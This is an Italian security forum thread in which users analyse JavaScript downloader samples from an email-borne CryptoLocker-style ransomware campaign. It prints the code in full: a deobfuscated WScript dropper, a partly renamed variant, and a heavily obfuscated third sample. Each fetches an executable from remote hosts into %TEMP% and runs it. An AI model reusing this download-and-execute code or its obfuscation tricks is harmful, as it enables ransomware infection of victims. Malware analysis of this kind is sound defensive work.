Codice: Seleziona tutto
Re: I file js del cryptlocker
/*
In questo blocco viene inizializzata la maggior parte
delle variabili globali (tutte costanti) utilizzate nello script
*/
// Numero: 200 è il codice di stato HTTP "OK": richiesta andata a buon fine
var STATUS_OK = 200;
// Stringa: Metodo di richiesta HTTP: "GET"
var METHOD_GET = "GET";
// Stringa: Metodo Exec: "Runs an application in a child command-shell"
var METHOD_EXEC = "Exec";
// Stringa: Oggetto Wscript: "Provides access to the native Windows shell"
var W_SCRIPT_SHELL = "WScript.Shell";
// Stringa: Oggetto IXMLHTTPRequest
var MSXML2_XMLHTTP = "MSXML2.XMLHTTP";
// Stringa
var ADODB = "ADODB";
// Stringa
var STREAM = "Stream";
// Stringa: Variabile d'ambiente %TEMP%
var TEMP_ENV = "%TEMP%\\";
// Stringa: Estensione ".exe"
var EXE_EXTENSION = ".exe";
// Numero: Dimensione minima del file (in byte)
var MIN_FILE_SIZE = 20000;
// Array contenente stringhe: Sorgenti URL
var URLS = ["http://skuawill.com/93.exe", "http://skuawillbil.com/93.exe"];
// Numero: Nome del file
var FILE_NAME = 35184372088832;
// Creo un oggetto WScript.Shell
var wShell = WScript.CreateObject(W_SCRIPT_SHELL);
// Creo un oggetto IXMLHTTPRequest
var httpRequest = WScript.CreateObject(MSXML2_XMLHTTP);
// Creo un oggetto ADOB: "Represents a stream of binary data or text"
var stream = WScript.CreateObject(ADODB + "." + STREAM);
// Espansione della variabile d'ambiente %TEMP%
var tmpDir = wShell.ExpandEnvironmentStrings(TEMP_ENV);
// Percorso completo che punta a dove si troverà il malware scaricato
var storedFilePathName = tmpDir + FILE_NAME + EXE_EXTENSION;
/*
Ciclo for: ad ogni passo del ciclo, si avanza nell'array URLS
selezionando di volta in volta uno specifico URL verso cui si effettua
una richiesta HTTP GET per scaricare il malware.
Eventuali errori durante l'esecuzione del blocco di codice sono ignorati.
Qualora nessuno degli url inclusi fosse raggiungibile, non viene fatto nulla.
*/
for (var v = 0; v < URLS.length; v++) {
try {
var url = URLS[v];
httpRequest.open(METHOD_GET, url, false);
httpRequest.send();
if (httpRequest.status == STATUS_OK) {
try {
stream.open();
stream.type = 1;
stream.write(httpRequest.responseBody);
if (stream.size > MIN_FILE_SIZE) {
v = URLS.length;
stream.position = 0;
stream.saveToFile(storedFilePathName, 2);
}
} finally {
stream.close();
}
}
} catch (ignored) {}
}
/*
L'argomento passato alla shell è il risultato della concatenazione
del percorso ottenuto dall'espansione della variabile d'ambiente %TEMP%
e della stringa che è il risultato di 2^45 (35184372088832): si tratta
di un piccolo espediente per offuscare un po' il codice; corrisponde
infatti al contenuto della variabile "FILE_NAME"
*/
wShell[METHOD_EXEC](tmpDir + Math.pow(2, 45));
dovrebbero essere tutti e tre dei downloader.hashcat ha scritto:Il secondo dovrebbe essere il downloader che dà il via all'infezione.
Quindi sono campioni differenti della stessa famiglia... (pensavo che gli altri due, che non ho ancora analizzato, fossero componenti relativi ad un'unica infezione).crazy.cat ha scritto:dovrebbero essere tutti e tre dei downloader.
Mi piaceva capire cosa facevano e se poteva interessare anche ad altri.
sono tre file arrivati via mail e avviati dalle persone che li hanno ricevuti e hanno dato il via all'infezione, peccato solo che non funzionano già più, i server a cui puntavano sono già spenti.hashcat ha scritto:Quindi sono campioni differenti della stessa famiglia... (pensavo che gli altri due, che non ho ancora analizzato, fossero componenti relativi ad un'unica infezione).
OK.crazy.cat ha scritto:sono tre file arrivati via mail e avviati dalle persone che li hanno ricevuti e hanno dato il via all'infezione, peccato solo che non funzionano già più, i server a cui puntavano sono già spenti.
Codice: Seleziona tutto
http://helloworldqqq.com/93.exe
http://wtfisgoinghereff.com/93.exeCodice: Seleziona tutto
var reactionarylpE = 200;
var admonishPuh = "GET";
var doggedtVQ = "Exec";
var debaclecLW = "WScript.Shell";
var decorumeUW = "MSXML2.XMLHTTP";
var latitudeWG8 = "ADODB";
var cajolehNw = "Stream";
var dyspepticAWP = "%TEMP%\";
var iconoclastjzB = ".exe";
// Dimensione minima del file (in byte): hanno sbagliato la potenza?
var lodeWWG = 2e5;
// Sorgenti URL
var librettodFv = ["http://helloworldqqq.com/93.exe", "http://wtfisgoinghereff.com/93.exe"];
// Nome file
var patronizeyDX = 524288;
// Ovvero: WScript.CreateObject("WScript.Shell")
var rampartIf9 = WScript.CreateObject(debaclecLW);
// Ovvero: WScript.CreateObject("MSXML2.XMLHTTP")
var ensuewuy = WScript.CreateObject(decorumeUW);
// Ovvero: WScript.CreateObject("ADODB" + . + "Stream")
var notwithstandingrpV = WScript.CreateObject(latitudeWG8 + . + cajolehNw);
// Ovvero: WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%\")
var homilys5o = rampartIf9.ExpandEnvironmentStrings(dyspepticAWP);
// Percorso completo che punta dove si troverà il malware scaricato
var halcyonouK = homilys5o + patronizeyDX + iconoclastjzB;
// Valore booleano: sarà utilizzato per indicare se il malware è stato scaricato correttamente
var errantNaM = false;
Il terzo è praticamente identico al primo oltre alla differenza già segnalata (ed al fatto che è maggiormente offuscato) include anche una funzione per decodificare le stringhe offuscate (applica una decodifica base64 e poi "decripta" il risultato utilizzando la chiave contenuta nella variabile "cipher").crazy.cat ha scritto:Penso che utilizzo solo il primo almeno è leggibile.
Potresti scrivere un esempio?crazy.cat ha scritto:La cosa interessante è che i nomi degli eseguibili, quando sono poi nel computer, sono completamente diversi.
Non ricordo a quali js erano associati, ma questi sono gli eseguibili che ho trovato nei pc.hashcat ha scritto:Potresti scrivere un esempio?
Tutti morti, come scrivono nella richiesta di riscatto "Purtroppo questi siti sono temporari" 3 giorni e poi chiudono tutto.l'unica cosa che verificherei prima è se gli url sono ancora attivi.
Codice: Seleziona tutto
http://deleondeos.com/img/script.php?tup1.jpg
http://deleondeos.com/img/script.php?tup2.jpg
http://deleondeos.com/img/script.php?tup3.jpgCodice: Seleziona tutto
%TEMP%\2352159.scr
%TEMP%\53652159.scr
%TEMP%\73652159.scrCodice: Seleziona tutto
/*
La funzione viene invocata per tre volte con tre argomenti:
"a90sYKcz6", tipo stringa: url da contattare
"aLOEaHx63", tipo stringa: nome file che assumerà il malware scaricato
"auLGnPgF4", tipo numero: svolge la funzione di booleano
(se > 0 il malware scaricato sarà eseguito)
*/
function aeHi7Sv0T(a90sYKcz6, aLOEaHx63, auLGnPgF4) {
// ActiveXObject("WScript.shell")
var aXYbQtcKD = new this['A' + ('72HN', 'FL', 'wev', 'c') + '' + ('IttFTF', '4Fspm', 'R7s4y', 't') + 'i' + ('gn', 'V8x', 'n2If', 'v') + 'e' + ('Jr', 'ob', '3D', 'X') + 'O' + ('mrxO', '5pDl', 'ShVpJ', 'b') + '' + ('rxdE', 'FJF', 'TJut9Q', 'j') + 'e' + ('FqL43', 'RV', 'Ml7', 'c') + '' + ('zD2dUH', 'zyRj2l', 'Tf9y', 't') + '']('WSc' + ('J2uFr', '1zm', '8ZRmTz', 'r') + 'i' + ('7cM9', 'f3No', 'tjfdm', 'p') + 't.' + ('N1UmoK', 'nBSh', 'dL', 'S') + '' + ('ysXN', 'Lc7e', 'msS7', 'h') + 'e' + ('8g2w0', 'UCrc', 'EX63vy', 'l') + '' + ('4Mv', '11', 'tUFQ', 'l') + '');
// ExpandEnvironmentStrings("%TEMP%")+ "\" + aLOEaHx63;
var aLOEaHx63 = aXYbQtcKD['Ex' + ('Dl', 'bf', 'Cryhp', 'p') + 'a' + ('Udm', 'h8J', 'aL2E', 'n') + 'd' + ('ufxBS', 'I48tHz', 'YZ', 'E') + 'n' + ('TTG', 'bP', 'EZBHDh', 'v') + '' + ('wW', 'pPruX', 'bxWawC', 'i') + '' + ('waxH', 'om', 'Z3DgtL', 'r') + 'o' + ('vdfW', 'dRTKO', 'hr', 'n') + 'm' + ('XJeEJ', '0JC3n', 'w9HXEU', 'e') + '' + ('Bptva', 'zrI', '9F', 'n') + 't' + ('kC0', 'mDo', 'xVSeS', 'S') + 't' + ('48', 'uBgFS', '7BYghR', 'r') + 'i' + ('tEVPi', 'zPf', '37Yc', 'n') + '' + ('WH', 'cmA3t', '1Ju', 'g') + 's']('%T' + ('n2', 'cl', 'MaB', 'E') + '' + ('Icq', 'jnC1AZ', 'DtOFd', 'M') + '' + ('BoWD', '8ZLU', 'm8', 'P') + '%') + String['f' + ('P1E', 'EFN', 'hr657', 'r') + '' + ('GVN', 'zcLyY', 'IlP6r', 'o') + '' + ('sO96uX', 'LoQRw', 'gc', 'm') + '' + ('PF', 'Ade', 'WA6', 'C') + '' + ('hZ', '58zz', 'jl', 'h') + '' + ('c1', 'ser', '37LE', 'a') + '' + ('Wh', '2kBk', '5ps', 'r') + 'C' + ('yYl38x', 'u0', 'Wwn', 'o') + '' + ('2pi', 'GS11ul', 'zLO', 'd') + '' + ('nc6ql', 'wPEPL', 'cP', 'e') + ''](92) + aLOEaHx63;
// ActiveXObject("MSXML2.XMLHTTP")
var addBXpb4b = new this['A' + ('JdV', 'eW6Ai', 'l6T6t', 'c') + '' + ('UqQ', 'gug1', 'tR6I5', 't') + 'i' + ('0saXzK', 'e6l', 'cP', 'v') + '' + ('KFfa', 'KrXpUO', 'CUmy', 'e') + 'X' + ('ISot7D', 'tMNj', 'c3', 'O') + 'b' + ('eAcF', 'Czn7', 'hu', 'j') + 'e' + ('js', 'HW', 'lw', 'c') + 't']('M' + ('Y8w', 'NY', 'obW', 'S') + 'XM' + ('vjVHBp', 'NIUS', 'R4Mn', 'L') + '2.' + ('HH1dJP', '0d', 'Wab', 'X') + 'M' + ('6a6v', 'TexLF', 'PrMz', 'L') + 'H' + ('hnG1', 'S1q', 'YAr', 'T') + 'T' + ('xB', '3d', 'iL', 'P') + '');
// addBXpb4b[onreadystatechange] = function ()
addBXpb4b['on' + ('Go', 'gJqx77', 'j0AJ', 'r') + '' + ('kHZq', 'ABi', 'HBzyyK', 'e') + '' + ('HvH72O', 'B7f', 'Rw', 'a') + 'd' + ('dJ', 'tkeM8', 'nItVtJ', 'y') + 's' + ('ez', 'hnx', 'vM4miO', 't') + 'a' + ('ybZS', 'L1m8', 'P4dzW', 't') + '' + ('wF4Uc', 'pZ1MiP', 'Onx', 'e') + 'c' + ('Yzh', 'I2a', 'fJJDw', 'h') + '' + ('Bav', 'zuAm', 'pIBNf', 'a') + '' + ('dY', 'yHo', 'tErch', 'n') + 'g' + ('AzC5', 'cA', 'yn8gY', 'e') + ''] = function () {
// if (addBXpb4b[readystate] === 4) *request finished and response is ready*
if (addBXpb4b['re' + ('0Kn', 'i4L', 'yp', 'a') + '' + ('Gqdg0', 'm82XRA', 'ZRj', 'd') + 'y' + ('IW8', 'ir', '4s', 's') + 't' + ('Vt9m', 'qmwNv', 'Lm96', 'a') + '' + ('qh', '8dyd', 'ZoAs', 't') + '' + ('nz', 'JfE', 'Ms', 'e') + ''] === 4) {
// ActiveXObject("ADODB.Stream")
var aZIlHfrKK = new this['A' + ('Yuj', 'vJC', 'RPt5ms', 'c') + '' + ('Vz0i9e', 'oS', 'al', 't') + 'i' + ('yK0R', 'wA', 'rsxUy', 'v') + 'e' + ('1Qi', 'QBK4E', 'XO', 'X') + '' + ('AQR', 'QIr', 'j8O', 'O') + 'b' + ('Jkz6m', 'pYf1', 'kGSiu', 'j') + '' + ('53sqU', 'Rh', '06hG', 'e') + 'c' + ('fVYFl', 'VmFf2x', 'xKaD', 't') + '']('AD' + ('JO', '1jW7AD', 'cSSayd', 'O') + '' + ('ALJD', 'hb4', 'OS4S', 'D') + 'B' + ('ODbLLM', 'HYhA', 'PO', '.') + '' + ('o11', 'kj', 'oL1', 'S') + '' + ('UTIJxU', 'iGT0', 'bAO1o', 't') + '' + ('N5m', 'pG2Nr4', 'gZ', 'r') + 'ea' + ('IwTdPA', 'Pf', 'q4k', 'm') + '');
aZIlHfrKK['open']();
aZIlHfrKK['type'] = 1;
aZIlHfrKK['write'](addBXpb4b['ResponseBody']);
aZIlHfrKK['position'] = 0;
aZIlHfrKK['saveToFile'](aLOEaHx63, 2);
aZIlHfrKK['close']();
};
};
try {
// addBXpb4b[open](GET, a90sYKcz6, false);
addBXpb4b['op' + ('cEZ1OV', 'iy', '4DR1yc', 'e') + '' + ('fmbXln', 'UHQ', 'jICX', 'n') + '']('GE' + ('EK4dE', 'Qv', 'pI', 'T') + '', a90sYKcz6, false);
// addBXpb4b[send]()
addBXpb4b['s' + ('XsWiPc', 'w2D', 'KgOtUA', 'e') + '' + ('FkiOb', 'ZAxARv', 'jsR9', 'n') + 'd']();
// Se vero, il malware sarà eseguito
if (auLGnPgF4 > 0) {
// aXYbQtcKD[Run](aLOEaHx63, 0, 0);
aXYbQtcKD['R' + ('GJwrZ', 'VTV', 'xA', 'u') + '' + ('pyFo8c', '0Iyjap', 'Pu8w', 'n') + ''](aLOEaHx63, 0, 0);
};
} catch (er) {
};
};
aeHi7Sv0T('ht' + ('dZS6VV', 'wivVQ', 'kZ', 't') + 'p' + ('Z5R', 'fhL', 'MU', ':') + '/' + ('zy', 'yrk', 'mZ0F', '/') + 'd' + ('wFgw2A', '7sOm', 'Arwu2', 'e') + 'l' + ('BK', '256p5', '5A', 'e') + '' + ('fk7hV', 'onsL7', 'cD', 'o') + 'n' + ('azQ', 'cT0ii6', 'nGuZ', 'd') + 'eo' + ('7dLLC9', 'ngf', 'ULP4', 's') + '.' + ('Zxz0Q', '6hgNMg', 'CnXn9', 'c') + 'o' + ('mWNB', 'InnM', '3MhDN', 'm') + '' + ('UpMH', '2rP', 'oczX', '/') + 'im' + ('UxxsfV', '2FTPWw', '42wuP', 'g') + '' + ('SFwj4', 'T2tPX', 'np', '/') + '' + ('ejX', '8U', 'LZHit', 's') + 'c' + ('aocG', 'gpAjS', 'gUNF', 'r') + '' + ('Uu', '1D', 'GpXnHr', 'i') + 'pt' + ('Bip', '0GI', 'ZB1gv', '.') + 'ph' + ('GVQbZS', 'YyeWVV', 'P9Z', 'p') + '' + ('h9f0', 'fBMw7', 'sNxiZ', '?') + 't' + ('Ow', '2sEYQ', '7PCG', 'u') + '' + ('W7wcJ', 'IQV', 'Et', 'p') + '1' + ('1Dsxm', '00tQ', 'AF7h', '.') + 'jp' + ('dUqqEK', 'vG', '99N', 'g') + '', '2' + ('fJNK', 'OdAjN', 'q53', '3') + '' + ('YLJ', 'vS7bc', 'lZ4', '5') + '2' + ('kfd4', '2izl5Q', 'bU6uS', '1') + '59' + ('vn5', 'yiUTi', 'pIkFWp', '.') + 's' + ('HejN56', 'ZcsR4F', 'rL0', 'c') + 'r', 1);
aeHi7Sv0T('h' + ('TmVi5f', '1EC0lR', '8Wq', 't') + '' + ('DyNHea', 'Zb', '36', 't') + '' + ('1kvg', 'xVV', 'gMTp', 'p') + ':/' + ('vEX', 'rF', 'COi', '/') + 'de' + ('mTZNUk', 'bDQ', 'yo', 'l') + 'e' + ('hN3', 'iHyn', 'dG', 'o') + 'nd' + ('Zy', 'msZ9nk', 'yXiF', 'e') + 'o' + ('3QXQU', '9C7x', 'lexnd', 's') + '' + ('Axm', 'UGctE', '99bd', '.') + '' + ('3V', 'dxPLj', 'ZQ', 'c') + 'o' + ('VVN', 'iwoZ', 'SDd1N', 'm') + '/' + ('Oxi', 'fwg5h', 'ggqO', 'i') + 'm' + ('KgP', 'Ne', 'w6', 'g') + '/s' + ('7u8mj', 'F2Vbj', 'tT', 'c') + '' + ('j6dFR', 'uVgI', 'NOFxW9', 'r') + 'ip' + ('slY', 'haOj', 'HAn1H', 't') + '.' + ('z4bul', 's8J7FF', 'lZK', 'p') + 'hp' + ('fY84hL', 'S9NAJ', '9OFD', '?') + '' + ('6hid', 'YviXfZ', 'vY3zgP', 't') + 'u' + ('Y9', 'IDSwi', 'FRCW', 'p') + '' + ('T8lb6B', '16', '4F', '2') + '.' + ('1xRbgA', '967FLZ', 'I97', 'j') + 'p' + ('tNo', 'Yq', '8u', 'g') + '', '53' + ('S5g', 'mQ', 'vWZaIY', '6') + '5' + ('8z2q', 'QP', 'Pf', '2') + '' + ('K7u8ZA', '3We', 'sbVCTT', '1') + '' + ('2Em', 'GcjN', 'y4', '5') + '9.' + ('btr', '4Q', '05a', 's') + 'c' + ('569', 'at2OPv', '1Oi2', 'r') + '', 1);
aeHi7Sv0T('ht' + ('Gy', '8KzY', 'A3a3jg', 't') + '' + ('fkWi', 'LN', 'NCXQZ', 'p') + '' + ('GTmODV', 'DvQNz', '3I', ':') + '/' + ('3AB', 'mp', '91O019', '/') + 'de' + ('2evG9', 'jF8', 'ej', 'l') + '' + ('Xu0x5c', 'u44wS4', '2Vf5', 'e') + '' + ('Lj35Z', 'ce', 'mbsQ', 'o') + '' + ('WpUrtY', 'm2voXK', '7vfq', 'n') + 'd' + ('pLw', 'gTPIJ', 'IG', 'e') + 'o' + ('7UA5g', 'BFAl9', 'Ro8qI', 's') + '.' + ('ec', '82aR', 'Sy', 'c') + 'o' + ('Fq5L', 'ImmjI', '1zU9', 'm') + '' + ('IbRVD', 'XNR2Gq', 'c5Yh', '/') + 'im' + ('0d2jV', 'kutu', '6dGY', 'g') + '' + ('X67', '8OfG0l', 'ickip', '/') + 's' + ('lWXQp', 'lvE1', 'NlrT', 'c') + 'r' + ('2hx', 'hTnz5', 'Sv6uQ', 'i') + '' + ('GsT1', 'y3sloU', 'Rcg', 'p') + '' + ('ZpCnZ', '6Rdcm', 'fN', 't') + '.p' + ('HNGfQ', 'Ae', 'P6', 'h') + '' + ('eY', 'EB', 'Djzv', 'p') + '?' + ('RB1Fm', 'm9pC0', 'dfB2', 't') + 'u' + ('9AOffq', 'SJjog', 'fS', 'p') + '' + ('eQhogT', 'O6D', '9Zfi', '3') + '.' + ('yO', 'hHdA', 'uF', 'j') + 'p' + ('NgB', 'xZTro', 'y16I1', 'g') + '', '7' + ('qzpU', '67qcC6', 'YTNz', '3') + '6' + ('yrN', '9mZf40', '5A2FZ', '5') + '21' + ('64Wi', '3QFXE', 'u0N', '5') + '9.' + ('K5aJlf', 'XlkZ0', 'Wwr', 's') + '' + ('JIvA', 'teC', 'eqU2aZ', 'c') + '' + ('krEiNZ', 'Njf', 'KgM', 'r') + '', 1);
